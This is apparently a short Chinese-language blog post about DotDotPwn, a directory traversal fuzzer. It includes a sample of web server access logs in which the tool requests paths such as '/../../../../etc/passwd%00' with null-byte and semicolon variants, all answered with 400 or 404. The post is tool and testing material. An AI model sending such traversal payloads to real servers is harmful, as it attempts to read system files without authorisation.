引用 : https://github.com/hatRiot/dotdotpwn

DotDotPwn - The Directory Traversal Fuzzer

It's a very flexible intelligent fuzzer to discover traversal 
directory vulnerabilities in software such as HTTP/FTP/TFTP 
servers, Web platforms such as CMSs, ERPs, Blogs, etc. 

用 Perl 寫的

不過要小心使用,別在正式環境上測試比較好,它會產生非~~~~~~~~~~~常多的 GET 記錄

(沒想到有這麼多的 ..)

10.10.10.134 - - [01/Aug/2014:13:19:52 +0800] "GET /../../../../etc/passwd%00 HTTP/1.0" 404 1311 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; Hotbar 3.0)\r"
10.10.10.134 - - [01/Aug/2014:13:19:52 +0800] "GET /../../../../etc/passwd%00index.html HTTP/1.0" 404 1311 "-" "Mozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC)\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../etc/passwd%00index.htm HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.1.11pre) Gecko/20100629 SeaMonkey/2.0.6pre\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../etc/passwd;index.html HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko) (Kubuntu package 4:3.4.3-0ubuntu1)\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../etc/passwd;index.htm HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.9) Gecko/20100331 Firefox/3.5.9 Lunascape/6.1.4.21478\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../../etc/passwd%00 HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8\r"
10.10.10.134 - - [01/Aug/2014:13:19:54 +0800] "GET /../../../../../etc/passwd%00index.html HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4\r"
10.10.10.134 - - [01/Aug/2014:13:19:54 +0800] "GET /../../../../../etc/passwd%00index.htm HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061230 BonEcho/2.0.0.1\r"
10.10.10.134 - - [01/Aug/2014:13:19:54 +0800] "GET /../../../../../etc/passwd;index.html HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\r"
10.10.10.134 - - [01/Aug/2014:13:19:55 +0800] "GET /../../../../../etc/passwd;index.htm HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1\r"
10.10.10.134 - - [01/Aug/2014:13:19:55 +0800] "GET /../../../../../../etc/passwd%00 HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.6) Gecko/20070809 Camino/1.5.1\r"
10.10.10.134 - - [01/Aug/2014:13:19:55 +0800] "GET /../../../../../../etc/passwd%00index.html HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Darwin; FreeBSD 5.6; en-GB; rv:1.9.1b3pre)Gecko/20081211 K-Meleon/1.5.2\r"
10.10.10.134 - - [01/Aug/2014:13:19:56 +0800] "GET /../../../../../../etc/passwd%00index.htm HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Fedora/1.0.4-1.3.1 Firefox/1.0.4\r"
10.10.10.134 - - [01/Aug/2014:13:19:56 +0800] "GET /../../../../../../etc/passwd;index.html HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)\r"
(省略)
Related posts 相關文章
駭客工具備忘錄 cheatsheet
More...
網路上仍然有超過 8 萬個 Hikvision 海康威視攝影機存在漏洞未更新
More...
Apache 有 path traversal 目錄遍歷的漏洞
More...
分析被駭主機的惡意程式
More...

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。